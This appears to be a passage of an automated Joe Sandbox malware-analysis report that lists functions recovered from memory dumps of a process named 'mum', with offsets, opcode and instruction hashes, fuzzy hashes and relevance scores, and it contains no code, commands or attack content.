Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b5d0b8e3ce7e3da1155780b4f03160eb2198bc29e867d034a1f1eac5b361ecd
Instruction ID: 8c6ac444fb7c4e3022546503d51da0e7dea75d46e3227845b48ba970fcd55820
Opcode Fuzzy Hash: 9b5d0b8e3ce7e3da1155780b4f03160eb2198bc29e867d034a1f1eac5b361ecd
Instruction Fuzzy Hash: 5B217F7092424ACFCB10CFA8D888AEDBBF9BB09300F50166AD455EB351EB70CE94DB51

Uniqueness

Uniqueness Score: -1.00%

Function 002C04B8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e335296d4f1de90c5b84ac4df20ab1d47c45c6ac663c69402ef2979299c23cc
Instruction ID: acfe812a1bc00e86a26e68a4e77de7781aa5e913fc2edb45db2cbc567fe961f4
Opcode Fuzzy Hash: 8e335296d4f1de90c5b84ac4df20ab1d47c45c6ac663c69402ef2979299c23cc
Instruction Fuzzy Hash: 8F1129303041466BD7489BB899516AFB75FAFCA340F18C12EA10ACB257DF704C0183A2

Uniqueness

Uniqueness Score: -1.00%

Function 002C007C Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59a597c3b440ff2493673e591e12490fca1e9e26c8ce6c091877b7c7fb72e5fa
Instruction ID: c9387a2a965b7e69882b8b32cea8d90585466b03030b7e982b81c885ab35db18
Opcode Fuzzy Hash: 59a597c3b440ff2493673e591e12490fca1e9e26c8ce6c091877b7c7fb72e5fa
Instruction Fuzzy Hash: 8201083032400A9BD74CABA89951B6EA68FAFC9340F24C53DA10BCB799DF748C1147E2

Uniqueness

Uniqueness Score: -1.00%

Function 002C9BC8 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39e8d577042bad895acc897859a9844c75551a4391df36dbd6177609265cb1af
Instruction ID: 717dd6ca05e58f9859a1a9c58c95e453852c31cd3e9f73369a6516ef369a7d3d
Opcode Fuzzy Hash: 39e8d577042bad895acc897859a9844c75551a4391df36dbd6177609265cb1af
Instruction Fuzzy Hash: 52115E70D2460DCBDB00CFA9D848BEDB7F9AF49300F10966AD409D7250EBB09A94CB81

Uniqueness

Uniqueness Score: -1.00%

Function 000BD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1046905033.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_bd000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a114d01c5a5f1a03a97ba52f97c9c692c46633ee86330d709a000a397d3c51a
Instruction ID: ba5e2e4f7fd756494b4b694c448d5dca3d4d1cb4673163c1573e988d7bf73591
Opcode Fuzzy Hash: 4a114d01c5a5f1a03a97ba52f97c9c692c46633ee86330d709a000a397d3c51a
Instruction Fuzzy Hash: B411B879904280DFCB42CF10D5C4B15FFA2FB94314F28C6AAD8094B656C33AD80ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 002C1EF0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5925652cb3e5eb43e494b3cbb0f4498375e005b016ad29fa61f39b0bf013bca
Instruction ID: 803f0022823370c0b6f889a9c15fd927b4a8080faf66bd8da84d869692d95cf3
Opcode Fuzzy Hash: e5925652cb3e5eb43e494b3cbb0f4498375e005b016ad29fa61f39b0bf013bca
Instruction Fuzzy Hash: B2014C757500144F8788EB7CD458D5E37E6AFDD26531201B8E60ACB372EE24DC52CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 002CA49F Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6f7c49db2f65e39bf6e89269e7a3b020192488975ca8508c4159d68f0b90486
Instruction ID: 875506ae0db4bcd574b3404161a3b19481b71fc044c1b1f2734c628b124798c7
Opcode Fuzzy Hash: c6f7c49db2f65e39bf6e89269e7a3b020192488975ca8508c4159d68f0b90486
Instruction Fuzzy Hash: F711DD7092421ECBCB10DFA8DC98BADBBF5BF49304F105A2AE405E7251EB719A94DB40

Uniqueness

Uniqueness Score: -1.00%

Function 002CA0F7 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53adb3b5597fb8fe37b0400f6ba8773790363080f84ca228f1963cdbb843a48
Instruction ID: 130eadb84c4b26658bf28d0536eb70a373d6ed7a32ea7c1787eb0529e68c1d4b
Opcode Fuzzy Hash: f53adb3b5597fb8fe37b0400f6ba8773790363080f84ca228f1963cdbb843a48
Instruction Fuzzy Hash: 1B116734A2021DCFDB54CF24C908BADBBB6FF89300F1081A9940EA2355DB301E89DF02

Uniqueness

Uniqueness Score: -1.00%

Function 002CA32C Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3cb7acc19a7d4e6118380d6ad78cb2a735c73da14fdfb22a2bd9b29d2ba0f83
Instruction ID: c4b0f7c81aa8e31b81a54653251365afed267b66c4da750f91f2a7657fcdca86
Opcode Fuzzy Hash: d3cb7acc19a7d4e6118380d6ad78cb2a735c73da14fdfb22a2bd9b29d2ba0f83
Instruction Fuzzy Hash: E8111C70D2421ECBCB10CFA8D848BADB7F5BB09304F105A6AD449E7250E7B09A94CF80

Uniqueness

Uniqueness Score: -1.00%

Function 002C9EE1 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9efaf781e8106be6af067065ed8f998987fde0c01ac13670bc8d0ed74c74fab
Instruction ID: 21e0bc40b57994f7fdbd2c65e366708eea3e94a53999b7c56834e674a2dcbd49
Opcode Fuzzy Hash: c9efaf781e8106be6af067065ed8f998987fde0c01ac13670bc8d0ed74c74fab
Instruction Fuzzy Hash: 7B11FE7092421ECFDB10DFA8D848BADB7F9BF19300F10566AD409D7250E7709A94DF51

Uniqueness

Uniqueness Score: -1.00%

Function 002C3767 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2ad74a5a9630345293c551053a65470739188d1932a3a64ba3e97df204a9724
Instruction ID: a9b4003ff68fe31f9d29b958e4374a8cc3f7712cd1fba64a65462fde9f382145
Opcode Fuzzy Hash: b2ad74a5a9630345293c551053a65470739188d1932a3a64ba3e97df204a9724
Instruction Fuzzy Hash: 5011B7B5E142489BDB48CFA7C84099DFBB2FF89300B24D52AC406A7319EB705A068E45

Uniqueness

Uniqueness Score: -1.00%

Function 002C9C4C Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c119c1bd26c2b1129bbc88775230539e42ee41d25728dc25c0ec715321eef8f0
Instruction ID: 26ee6e123508ebdc1e81ecb25027a248508b0632135fb2731bbd9d0a954f48f9
Opcode Fuzzy Hash: c119c1bd26c2b1129bbc88775230539e42ee41d25728dc25c0ec715321eef8f0
Instruction Fuzzy Hash: BD11397492420ACFCB10CFA9D848BADB7F5BB09300F10562AE419D7250EB709A94DF51

Uniqueness

Uniqueness Score: -1.00%

Function 000AD1C1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1046731329.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_ad000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87dbf2223b9e23a177cbe2e55d326d0d99bfa7fdbd112420ad37817080d92805
Instruction ID: 2d5e8ddd6f085c1d81f6c232326f25a7a4d32a65c0c8d04131b77d4fc87d3b47
Opcode Fuzzy Hash: 87dbf2223b9e23a177cbe2e55d326d0d99bfa7fdbd112420ad37817080d92805
Instruction Fuzzy Hash: C201A731008744AAD7614B55D884B6BBBD8DF63724F18C167EE1A5A582D378DC40C7B5

Uniqueness

Uniqueness Score: -1.00%

Function 002C9DFB Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 154b0a22360e27ba14b26779efe1f887b645bee801aecedc781fa09d5915c8a6
Instruction ID: 33660ae4ee182ac76b8a4a79c06aec5407c1326ab60fa716a455c07abd3dd3e5
Opcode Fuzzy Hash: 154b0a22360e27ba14b26779efe1f887b645bee801aecedc781fa09d5915c8a6
Instruction Fuzzy Hash: 8801127493421ACFCB10CF68D848BEDB7F5BF1D300F60566AD45AD7241EB718A949B81

Uniqueness

Uniqueness Score: -1.00%

Function 002C07F8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f206edcb411bb6bcfab2fecfe8e5c124a16ec15e2e03e91b7617d89caa82d1a
Instruction ID: 88029c0b019ec05ef03ff3270086a0202a1db5becebe669894cbf4484ab5ab2b
Opcode Fuzzy Hash: 9f206edcb411bb6bcfab2fecfe8e5c124a16ec15e2e03e91b7617d89caa82d1a
Instruction Fuzzy Hash: 14014830A14209CBDB14DFA4C594BAEBBF9AB4C304F20422ED502F7384DBB59910CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 002C1F89 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49a0ac684080015e8adcc7c2be96914b89addc9454fe1b3727b84f742484b57d
Instruction ID: a54d00ac37557552f800c23aa8a03eeb0ee502fdc48d32570822c68dfa3ef00a
Opcode Fuzzy Hash: 49a0ac684080015e8adcc7c2be96914b89addc9454fe1b3727b84f742484b57d
Instruction Fuzzy Hash: 2BF0AF357441544FC745AB78D81895D3BE29FCA22131641B9EA0ACB372EE28CC028F91

Uniqueness

Uniqueness Score: -1.00%

Function 002C041F Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa716c14496d0ff8ff6fbc7b1d45181ce69e10dc38009c6f29695f131ae061fc
Instruction ID: 83d9fd949859d91e545ad18d2df4ef9b3c04dd5af791d86d9bb62af618e7d08e
Opcode Fuzzy Hash: fa716c14496d0ff8ff6fbc7b1d45181ce69e10dc38009c6f29695f131ae061fc
Instruction Fuzzy Hash: 38F0EC2120A6A01FC707A7788C6195A3F608E8315530605EFC049CF1E3CE199C0587FA

Uniqueness

Uniqueness Score: -1.00%

Function 000AD1C0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1046731329.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_ad000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82448f55278decf21fccc64aaaac5a4e9a9e46ea4a6c06313b6aba89aa0fbaee
Instruction ID: cd6cef090901254c4354026a8b3923633f717c4ba053a0c44ee8e2181699b6b3
Opcode Fuzzy Hash: 82448f55278decf21fccc64aaaac5a4e9a9e46ea4a6c06313b6aba89aa0fbaee
Instruction Fuzzy Hash: 20F0C272004244AAEB508A45D888B62FFD8EFA2724F18C15AFD085F282C378DC40CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 002C198E Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8762fcee40eeb9e8382a13192953acffe343c981ab5d6e8773d84c44dcd591fa
Instruction ID: 655f35ec258a6a8259013cd1d9f6fedf0e2226281232890a8434612b735e254f
Opcode Fuzzy Hash: 8762fcee40eeb9e8382a13192953acffe343c981ab5d6e8773d84c44dcd591fa
Instruction Fuzzy Hash: 07F0E5317101099F9B00FABAE895F9A77EADF89354B004134E605C7222FB30E8208691

Uniqueness

Uniqueness Score: -1.00%

Function 002C9E66 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c452a6b9ba8794220bd934b57f1a19545ebfeaad2b504363522634f29b3f6d32
Instruction ID: 3087e68ab5b2b47a4c05c5d6e903a8219255d685a525684a5fcf64414d3eab7e
Opcode Fuzzy Hash: c452a6b9ba8794220bd934b57f1a19545ebfeaad2b504363522634f29b3f6d32
Instruction Fuzzy Hash: 2201283495424ACFCB20DF64D848BBC7BB1FB04300F0101BAD41AA7751EB700984EF11

Uniqueness

Uniqueness Score: -1.00%

Function 002C1EBF Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5034e1bc64beb6ad25a65e1e7b3455e0beabdb769c683e39e81f6abaa4cd74df
Instruction ID: 4a4c6bf6e6747c11e02759a5e37d6e33dfbe6c690888e2f65b451467fc0f0a08
Opcode Fuzzy Hash: 5034e1bc64beb6ad25a65e1e7b3455e0beabdb769c683e39e81f6abaa4cd74df
Instruction Fuzzy Hash: ABE0D874B193500FDF025734689C0C93F91978730030506A7E545C72A3DA2848078751

Uniqueness

Uniqueness Score: -1.00%

Function 002C3618 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2913bdf0a035bf6df92e2e5b03fa0fd961db89da9886f8f27633cd36b740198f
Instruction ID: f2f202cd513b57b0b78a87c25bd9dfdd5eaf9d34b2f3b0e1b5a29209058199b9
Opcode Fuzzy Hash: 2913bdf0a035bf6df92e2e5b03fa0fd961db89da9886f8f27633cd36b740198f
Instruction Fuzzy Hash: 23E04830900208FFCB04EF94D9099DDBB75FB86311F108258E84863350D7709E54DF95

Uniqueness

Uniqueness Score: -1.00%

Function 002C16D1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db38f9a3532819aaf2d2d184b0857df5ef08d8bd1b9c5919cf150ac645dc508b
Instruction ID: fcb7688cd54c1e518344f8f4033ce5bf0e74b1503b736f6e945cc6d1d2a15890
Opcode Fuzzy Hash: db38f9a3532819aaf2d2d184b0857df5ef08d8bd1b9c5919cf150ac645dc508b
Instruction Fuzzy Hash: 33E09A74A0530AAFCB41DFA8E8108DEBBB1EF4230471111BAE008D7252EB300E02A711

Uniqueness

Uniqueness Score: -1.00%

Function 05129330 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1056086461.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5120000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cabed6126d5e6209549dfd0af86acfc53960b15606aad100bf99dd0664cf39f
Instruction ID: 0bd8dd39a867b670c5054589d76030df3d5d4478f80d29750a0d846a15840fbb
Opcode Fuzzy Hash: 1cabed6126d5e6209549dfd0af86acfc53960b15606aad100bf99dd0664cf39f
Instruction Fuzzy Hash: 99F0A53590420CEFCB05DF98D941A9DBBB5FB48310F14C199ED1467351C7329A61EF81

Uniqueness

Uniqueness Score: -1.00%

Function 002C4A26 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 733878520a0e1dca74414ae0d608b00b6234f606a4b43db4112920915fee473b
Instruction ID: 2db56dade5b32547f46f926e2161080c83e3fa448d89440de6fc8ef3fab5a0ab
Opcode Fuzzy Hash: 733878520a0e1dca74414ae0d608b00b6234f606a4b43db4112920915fee473b
Instruction Fuzzy Hash: 49F09B78E18208DFDB64CFB8C8A099DBBB0AF09304B24965ED815A7342D631A812EF04

Uniqueness

Uniqueness Score: -1.00%

Function 051266C8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1056086461.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5120000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbd4caa4fcddaa4ec5341fa411e7af415119756328f32edaadd6fa85c22d7ff7
Instruction ID: b1e5724f6d632e4d1f35e149cf11ac1792dbce5e1ec28f35bfb527252aeb3a4b
Opcode Fuzzy Hash: bbd4caa4fcddaa4ec5341fa411e7af415119756328f32edaadd6fa85c22d7ff7
Instruction Fuzzy Hash: 1EE0EE70E0420CEFCB04DFA9D840A9DBBB5AB48300F1082AAA904A3360DB359E54DF80

Uniqueness

Uniqueness Score: -1.00%

Function 05126470 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1056086461.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5120000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f755228b293f9fa7bd31b26b9e048e1b72568da5a8fd07c212d67fa05d0e99
Instruction ID: c6a4637e688c8c00076448110f92772af163e77a1c4fcac8eb3dc8259e886e74
Opcode Fuzzy Hash: d8f755228b293f9fa7bd31b26b9e048e1b72568da5a8fd07c212d67fa05d0e99
Instruction Fuzzy Hash: A5E01234904208EFCB00DFA8D884A9CBBB4BB09311F108199E94527360CB31AEA4EF80

Uniqueness

Uniqueness Score: -1.00%

Function 051263B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1056086461.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5120000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63d4365761b414867437747de1940e9ccdec430369c2be2f28cf2cc876e07bdb
Instruction ID: 89d78afd8dde4f7812513f8bb6db46817643a7f17a130c3b5961f0edde9ee130
Opcode Fuzzy Hash: 63d4365761b414867437747de1940e9ccdec430369c2be2f28cf2cc876e07bdb
Instruction Fuzzy Hash: 5CE01230E0420CEFCB44EFE9D44069DFBB4AB44300F1081A9D828A3350DB355A44CF80

Uniqueness

Uniqueness Score: -1.00%

Function 051293C0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1056086461.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5120000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5e30c96984961a9534c83a909a0fa9a093f5871257258beee752304f7bc4c86
Instruction ID: 457c6822ae9e24111952d4d1505ae51e81dd15b7af025c6e0af6c8a758c58f00
Opcode Fuzzy Hash: e5e30c96984961a9534c83a909a0fa9a093f5871257258beee752304f7bc4c86
Instruction Fuzzy Hash: 49E0E534904208EBCB04DFA8D550AACFBB4AB48200F14C1AAE85463391C7359A51DF94

Uniqueness

Uniqueness Score: -1.00%

Function 05124CA3 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1056086461.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5120000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f57e72a816195ee8947485bb375ac249e5d5602de9712118e7a04247650b7c40
Instruction ID: b3ddde028259c17718b53d3f375243f9841e4c14f1b80929a918eaacdefa5cfd
Opcode Fuzzy Hash: f57e72a816195ee8947485bb375ac249e5d5602de9712118e7a04247650b7c40
Instruction Fuzzy Hash: D2F0FDB49012A88FDBB4CF15CC84A9DBBB6BB48301F0041DAD60DA3351EB705E85CF04

Uniqueness

Uniqueness Score: -1.00%

Function 002CA3E0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64769720f6b3d73e2df8e2f55697ac99d0e754ea05b434ab852946a0e6ea0486
Instruction ID: 36bc6cfce10470fc5e66180206533a3384353dffb5f2aeaf7146bfe7108eff33
Opcode Fuzzy Hash: 64769720f6b3d73e2df8e2f55697ac99d0e754ea05b434ab852946a0e6ea0486
Instruction Fuzzy Hash: 6EE0123491020DCFEB20DFB4D848AACBBF1FB48300F20162EA412A3395DB700989EF41

Uniqueness

Uniqueness Score: -1.00%

Function 05126538 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1056086461.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5120000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffc0a52bf052de574fc1feca860f302dc5481a686e726453fc853bf2015057c2
Instruction ID: 33dc73d771860a0eb97f2bbd2921c858c86804174c75338b8bcc939caf90502f
Opcode Fuzzy Hash: ffc0a52bf052de574fc1feca860f302dc5481a686e726453fc853bf2015057c2
Instruction Fuzzy Hash: 26E0E27091420CEFCB40EFA8E98969CBBB4EB44201F1041A99908A3390EB305A58DB81

Uniqueness

Uniqueness Score: -1.00%

Function 002C0448 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 790e839bf2b12e4ac30a2a0e36c657390da664b9c99def5de8132060552d5ea8
Instruction ID: 2468ee88a73526cf8ccf59457b3a2d235d2b1f4495fe3d630221661fbcb01e44
Opcode Fuzzy Hash: 790e839bf2b12e4ac30a2a0e36c657390da664b9c99def5de8132060552d5ea8
Instruction Fuzzy Hash: 2DC0121130453812495932F85413E7F35494F8045A301013DD20F4B3D1DF1E9D0202FE

Uniqueness

Uniqueness Score: -1.00%

Function 002C16E0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 171f2ceeac61de03c7765eb3e3a9d90fd0dfd9b8ce48f381b309af621d63d677
Instruction ID: 17c12df06a53dfdabb202e44f7ee24aa3c2e86341a9d91d74e4da0934873e13a
Opcode Fuzzy Hash: 171f2ceeac61de03c7765eb3e3a9d90fd0dfd9b8ce48f381b309af621d63d677
Instruction Fuzzy Hash: 49D01770A0120DEB8B40EFA8E941DDDB7B9EB45204B1046B9A509E7300EB312F119B90

Uniqueness

Uniqueness Score: -1.00%

Function 05121CA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1056086461.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5120000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bec5a3c3c5a3ee7f88991e1b98ee5e5f60dff890f7ae144a68196817a025adbe
Instruction ID: a87bd9325cb3a2c36b87d0bc3b7bd0e0ca6f1942e569b0d3820efcba20f6c068
Opcode Fuzzy Hash: bec5a3c3c5a3ee7f88991e1b98ee5e5f60dff890f7ae144a68196817a025adbe
Instruction Fuzzy Hash: 14D05EB480412CCFEB28CF60C8487CAB7F1FB11300F0451E6D859AB202DB364B569F61

Uniqueness

Uniqueness Score: -1.00%

Function 051210D6 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1056086461.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5120000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a918a8e9eec356cc54ba9251762188d62ac5c12c092fd626af6f3b31cea5106
Instruction ID: f37d9280ce5e8c641717e517fa73678a3f315b814955c26be7bef1981b5a83ad
Opcode Fuzzy Hash: 5a918a8e9eec356cc54ba9251762188d62ac5c12c092fd626af6f3b31cea5106
